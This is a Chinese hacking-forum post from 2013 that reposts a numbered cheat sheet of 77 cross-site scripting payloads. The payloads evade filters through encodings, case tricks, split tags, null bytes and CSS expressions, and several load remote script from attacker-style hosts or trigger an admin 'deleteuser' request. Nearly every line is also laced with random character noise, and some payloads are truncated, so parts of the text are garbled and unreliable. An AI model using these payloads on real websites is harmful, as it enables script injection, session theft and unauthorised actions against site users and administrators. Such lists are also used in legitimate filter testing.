找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2906|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
3 `9 s, U" X/ M' A(1)普通的XSS JavaScript注入. g; j6 v. x& g4 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" w% y$ ^3 r0 P+ B2 A$ Y: y(2)IMG标签XSS使用JavaScript命令% H" p3 A4 B' p% \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* ?* @6 Q& x3 v* h; ~, v* B(3)IMG标签无分号无引号' @- }/ O) u6 v
<IMG SRC=javascript:alert(‘XSS’)>
- X* W" T# H& i/ s' A6 {0 V(4)IMG标签大小写不敏感( M" c# W, ?+ o2 k! c
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 {* J9 s! P7 t$ N, _( J(5)HTML编码(必须有分号)$ I7 j, q9 `& @1 e+ _
<IMG SRC=javascript:alert(“XSS”)>
0 w% l4 F, H: r. c: u(6)修正缺陷IMG标签
. ]9 _0 n9 Y3 x5 y: r. s! g* R2 x& C<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
( m, g# U) [+ _) P4 d7 @9 g2 K
. R; E( j2 O+ Q' b" G& L6 I! o# {: g
(7)formCharCode标签(计算器)
6 ]. N0 i7 G% x( f7 r# c5 B$ Y+ u3 v<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) e, ~' t5 s& s7 M* E
(8)UTF-8的Unicode编码(计算器)
9 u1 W3 s* z, S, Q; B8 M1 H. S<IMG SRC=jav..省略..S')>) k4 M  u' r+ W$ G6 A; X! o
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# z. ?$ n" _/ i+ {1 C6 O: t<IMG SRC=jav..省略..S')>
9 [% A! j3 |5 W# E7 k6 \. }(10)十六进制编码也是没有分号(计算器)6 [0 X! ^% q( N
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
2 p, ~* j9 \- S! P" A7 |/ S  Z(11)嵌入式标签,将Javascript分开
3 |- r  F$ W: f+ T2 \  |2 t# D<IMG SRC=”jav ascript:alert(‘XSS’);”>( G9 F% G4 y( y+ P- c" y$ K' @
(12)嵌入式编码标签,将Javascript分开' }$ q0 H0 {( n
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( L( `: i5 K  B4 D* g, {1 O0 O(13)嵌入式换行符
3 y: n/ v' I: x8 H* D( u8 t; y+ ~! b<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 u$ B8 E7 ^" U9 d; V3 T9 G(14)嵌入式回车: f# O" @, b" s- Y, m5 ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>( |. X; e% v- @& j7 ^1 A( }
(15)嵌入式多行注入JavaScript,这是XSS极端的例子6 v" O) p2 g/ _2 v  D5 F; D7 t: X
<IMG SRC=”javascript:alert(‘XSS‘)”>
$ K) @* k6 B- F2 t(16)解决限制字符(要求同页面)/ w: B5 c  k9 p( d) p
<script>z=’document.’</script>
- f5 V( f$ L% ]& }2 C- D% G/ @<script>z=z+’write(“‘</script>
5 c' m9 Y! ]" j( ]0 M<script>z=z+’<script’</script>! U! h+ e+ E* a; s7 n1 I1 w
<script>z=z+’ src=ht’</script>
. P$ m# k  N- g2 D# m3 ~1 A% k<script>z=z+’tp://ww’</script>
+ R7 w' H0 S5 A9 R% V<script>z=z+’w.shell’</script>. [7 C4 R( e7 S: f- L, J
<script>z=z+’.net/1.’</script>
+ n- ]0 m$ H# P+ K) R<script>z=z+’js></sc’</script>* R$ u6 c/ ~+ B0 @9 H) G
<script>z=z+’ript>”)’</script>3 L4 M4 q9 N, Z2 f4 j2 `9 p. f
<script>eval_r(z)</script># A* ~# r% ]' W  |/ z( a: E
(17)空字符12-7-1 T00LS - Powered by Discuz! Board! C9 z" K8 N3 `5 q+ |
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
" M( E1 E0 s+ \; c. ?6 n, A# Vperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; {* T+ |8 f( [(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 u6 L  m* w; M8 m) \/ y
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% M+ V7 m+ `3 i7 G
(19)Spaces和meta前的IMG标签" x* a9 [0 V. O
<IMG SRC=” javascript:alert(‘XSS’);”>6 @$ R, c5 F) |) t' X- s* V$ {
(20)Non-alpha-non-digit XSS
; @: w  o. ^2 X' [  M8 N, P1 L<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ f' n  Q' R/ U& b7 y1 K
(21)Non-alpha-non-digit XSS to 2
8 \/ F* w2 z* l1 S; d* H<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 N/ S8 M5 w- a, Q) z
(22)Non-alpha-non-digit XSS to 3# L4 N8 Y! ?5 H6 V1 V& N
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 w+ n. W( G% s2 k7 m9 U
(23)双开括号
+ r* ?0 s% d+ u5 J- [' y<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ J( ~# S: b% B9 l1 w& U3 n(24)无结束脚本标记(仅火狐等浏览器)
: F3 h0 @. \; b' n  m6 ^+ f  ?<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>- V  t" S4 ]) ~3 E: S: R. k
(25)无结束脚本标记2
/ ?% j1 e7 [2 f2 d4 g# ?<SCRIPT SRC=//3w.org/XSS/xss.js>" m( O5 I/ Y6 C
(26)半开的HTML/JavaScript XSS
" L: d* X+ w2 i6 D& t. ^<IMG SRC=”javascript:alert(‘XSS’)”+ u* H7 P! J( }  [
(27)双开角括号
3 T" Q4 q+ |6 R4 |, |* `- W<iframe src=http://3w.org/XSS.html <
( L, F* ?- D( W' Q# j7 ~(28)无单引号 双引号 分号7 g' }& ]* e6 i5 ?1 I4 E0 V
<SCRIPT>a=/XSS/; H! F5 D0 F6 q3 n
alert(a.source)</SCRIPT>
3 g7 h/ z/ ]7 u0 Z7 O, F) c(29)换码过滤的JavaScript9 J. |2 ?0 r4 P7 G( F8 k/ m
\”;alert(‘XSS’);//
" T$ W6 |5 ?4 h7 J( T/ Z6 l(30)结束Title标签
3 P$ J( @7 P% r0 I3 ?6 S</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 H; {) D( ^7 Q6 A; F$ R* Q(31)Input Image
+ i* i. X8 U+ o, A+ D<INPUT SRC=”javascript:alert(‘XSS’);”>
2 J0 d/ f- R" B(32)BODY Image
: y1 e9 B. O. S2 j6 n3 A<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
3 Q" w( X" O9 e* K6 k0 v+ t(33)BODY标签
/ L: y+ H& ?4 O' K& C% f<BODY(‘XSS’)>
7 d7 ^* K$ [, x6 g6 s(34)IMG Dynsrc8 y7 R  f* n) _4 A, [
<IMG DYNSRC=”javascript:alert(‘XSS’)”>0 p, n* d9 ?4 l- p: L' V  {& r
(35)IMG Lowsrc
; g  `# o4 R  U: N<IMG LOWSRC=”javascript:alert(‘XSS’)”>
2 W# D) F/ V+ ~8 B: D(36)BGSOUND
  |7 b+ v: c% k0 G- S1 w<BGSOUND SRC=”javascript:alert(‘XSS’);”>4 [& D1 L! B2 l8 B" X  Q- X) h  h/ \
(37)STYLE sheet
: m9 i) I/ ^* T8 {6 [9 q<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- d$ x8 h$ ?0 u  x% C4 c$ ]
(38)远程样式表
. Q7 U# f4 ~2 k/ k" U4 E  o<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>9 Y' M5 f6 C# q' p2 d
(39)List-style-image(列表式)" z+ i" L$ |% l+ m6 b$ N% W
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 q& g6 q3 G3 s3 a& y  l0 m: z0 @
(40)IMG VBscript
* m, I$ L# w$ D% l: Z$ q<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
, g! g' \8 w' ]. }" `/ k(41)META链接url) m4 ?6 U9 I3 F! q. i3 P
8 n% [+ D0 y8 Z" |9 y% L

5 U" t8 \3 G& C. G/ q+ P2 w/ t  q<META HTTP-EQUIV=”refresh” CONTENT=”0;
+ c: F  w4 c5 g1 OURL=http://;URL=javascript:alert(‘XSS’);”>
$ F/ L$ C% ^! V; @(42)Iframe6 h$ L- b, }& [# L# C
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 a7 m0 _  H5 L) k3 J/ N(43)Frame: d3 S8 r5 B; n- J& `. M8 L
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board- W* C9 L8 ~8 X7 y# z  H# Z
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
2 a" F) H& t! S& x0 T(44)Table% D0 |- _, O; ?) V
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) |) F; c" \+ G8 u  H1 W. v
(45)TD
8 d6 p) P6 x6 a8 v) b<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>' o% x/ e+ d$ `1 p5 h. P7 ~
(46)DIV background-image1 z$ v$ b% G" U2 H" a
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- c2 c1 M2 Z3 Z: y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
1 N: k$ n1 m9 x" p' f8&13&12288&65279), V9 W  z6 k5 G4 i0 x- {
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! C) r3 A9 h5 A$ U  K- ~6 d. p/ [; [4 ?
(48)DIV expression: s6 K2 g# \" {) x) L$ A% x3 d# b
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>* E; ?$ F" U. T1 S, c9 w
(49)STYLE属性分拆表达
3 A+ q4 e7 [2 d+ E1 Y<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># q3 L0 b) E7 {# r; N" Q; ^( C
(50)匿名STYLE(组成:开角号和一个字母开头)
) m  u0 o6 s3 o<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
) _0 ~$ O& e: b(51)STYLE background-image- m' w: c5 d, o2 x
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
  b- u& F4 t5 ~3 wCLASS=XSS></A>% q* t$ [  x  l0 h2 D
(52)IMG STYLE方式$ W; `% u; A9 e, Y( j: C4 u& y
exppression(alert(“XSS”))’>2 E" ~/ m9 C$ W2 D9 y! v1 N
(53)STYLE background
/ K% J/ n+ F8 q) V: J/ ?<STYLE><STYLE2 @& X5 M9 o3 U2 ^6 [7 J$ M
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
4 e* p/ s/ `0 c; k7 j. v(54)BASE
3 A; o3 E4 l1 e: b3 f  d- J<BASE HREF=”javascript:alert(‘XSS’);//”>4 [* W$ B  ]; J' m1 T% c! s* P0 z
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
% P3 g: E+ j* U<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: I1 w9 I5 \  K! t1 S6 _
(56)在flash中使用ActionScrpt可以混进你XSS的代码3 A* e6 `0 A+ |) }* c7 Z
a=”get”;
2 A0 |3 ~. A; g1 O1 O1 `/ Y, S% @b=”URL(\”";) U. B7 [- e) w( |  H. ^+ |/ j; D) j
c=”javascript:”;
2 f3 \4 W, ?2 f+ od=”alert(‘XSS’);\”)”;
/ K+ d: X" g0 z6 f* h5 J3 ^eval_r(a+b+c+d);
  c3 K& g- C! G2 D(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
9 Q$ \2 e) e/ V0 \. k$ \& C1 J: S* w<HTML xmlns:xss>
8 m# k# i$ e/ }<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
* w! Z* @( m* B! U( ?<xss:xss>XSS</xss:xss>. ]( N5 D! I& `  S7 F1 a
</HTML>1 X% ~7 Y) e0 L  t3 c4 Z
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
/ @# q, r: h* P  W) V5 R, }' ^& D<SCRIPT SRC=””></SCRIPT>" w3 J3 S3 u. Q9 H( U0 X& _+ r
(59)IMG嵌入式命令,可执行任意命令5 ]7 C, G  I) a  B9 A( K
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
* E- U4 B/ d4 I. U# c1 I/ d(60)IMG嵌入式命令(a.jpg在同服务器)% E' l" K3 {! V  f, q* S% }# E
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
" L( G+ l  G$ T8 w6 I* y(61)绕符号过滤
% f+ ^- T) G2 [4 O<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 U( v! a1 T3 x) t# r; x. V(62)+ H8 z4 v1 {& c7 q
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! ?/ [, y1 U1 D(63)
$ g' I8 K2 r9 L# }+ p<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>" G3 Q- Q! A. i3 G$ S
(64)  \1 m% j8 V; ]
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>5 |6 _  p7 |  P' ]1 W5 T" }" _
(65)* m" a  I+ c' }1 L" q
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>5 F  @0 d2 q: m. P. O% H& c9 r  Y% Z
(66)12-7-1 T00LS - Powered by Discuz! Board! t( k! ]6 n+ A" Y- ^
https://www.t00ls.net/viewthread ... table&tid=15267 4/64 V+ M: ?4 A1 e$ z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>$ F6 s. p4 W5 P4 j0 r
(67)9 J5 C6 B( p( a# |# T
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
* e% k6 h: @6 r</SCRIPT>1 y* C- e# ]& i
(68)URL绕行$ c! V! _5 N0 b  z7 `
<A HREF=”http://127.0.0.1/”>XSS</A>
/ A2 J8 w2 V2 H1 w(69)URL编码- J/ ]6 T9 @" n- F3 k3 N. w1 U6 b
<A HREF=”http://3w.org”>XSS</A>4 Y( Q. t$ s4 M/ L: z! u
(70)IP十进制: k7 Z' o3 h, A( T
<A HREF=”http://3232235521″>XSS</A>+ R3 R, H( U) d7 r8 H/ ~$ q0 d
(71)IP十六进制5 G' o+ ~2 F2 Z* e" b
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>  K8 _* X3 R& e# Y) t
(72)IP八进制. k' s: T% g, l( r, }
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
) a2 d8 O/ N$ Y: E; [% H4 |(73)混合编码$ z  }0 F+ R$ a1 s( s. b
<A HREF=”h
* Y5 p0 C( z1 H3 Mtt p://6 6.000146.0×7.147/”">XSS</A>
! u1 l  s- Z, \  j. G; ^* e(74)节省[http:]( M  H* j2 Y4 g( _, g: r0 G4 |5 t+ K- R
<A HREF=”//www.google.com/”>XSS</A>( }1 b6 h. D0 Z8 n- U* B  a
(75)节省[www]0 j, `+ y2 g) h* x3 r( {% L
<A HREF=”http://google.com/”>XSS</A>
' P( d+ u8 N* V+ ]" H* H(76)绝对点绝对DNS
" A  @. {6 |3 A( B4 C<A HREF=”http://www.google.com./”>XSS</A>
+ b7 ^& F" u1 s( j) h(77)javascript链接
) ~, x) t. m+ H: y<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>+ Q& v3 W7 v$ [/ a" W4 g1 a

& c0 v2 {3 j2 ~; a: m原文地址:http://fuzzexp.org/u/0day/?p=14
) p( m% _7 z1 u" ]& F! Y
" _) O' H1 k+ `1 g" p# v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表